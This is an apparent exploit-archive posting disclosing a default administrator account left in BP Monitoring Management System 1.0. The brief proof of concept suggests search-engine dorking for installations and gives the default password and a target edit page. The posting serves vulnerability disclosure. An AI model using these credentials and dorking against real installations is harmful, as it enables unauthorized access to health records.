BP Monitoring Management System 1.0 Insecure Settings

BP Monitoring Management System 1.0 Insecure Settings
Posted Sep 13, 2024
Authored by indoushka

BP Monitoring Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit
SHA-256 | a2b530b3e0a28bb00c704b528988d03e386681ffd62bb38b63be53c8ac992818
Download | Favorite | View
====================================================================================================================================
| # Title : BP Monitoring Management System 1.0 Insecure Settings Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Insecure Settings : appears to leave a default administrative account in place post installation.
[+] use payload : 
Username: [email protected]
Password: Test@123
[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1
Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================

نوشته های مشابه

Ubuntu Security Notice USN-7126-1

Ubuntu Security Notice USN-7127-1

Debian Security Advisory 5819-1

Akuvox Smart Intercom/Doorphone ServicesHTTPAPI Improper Access Control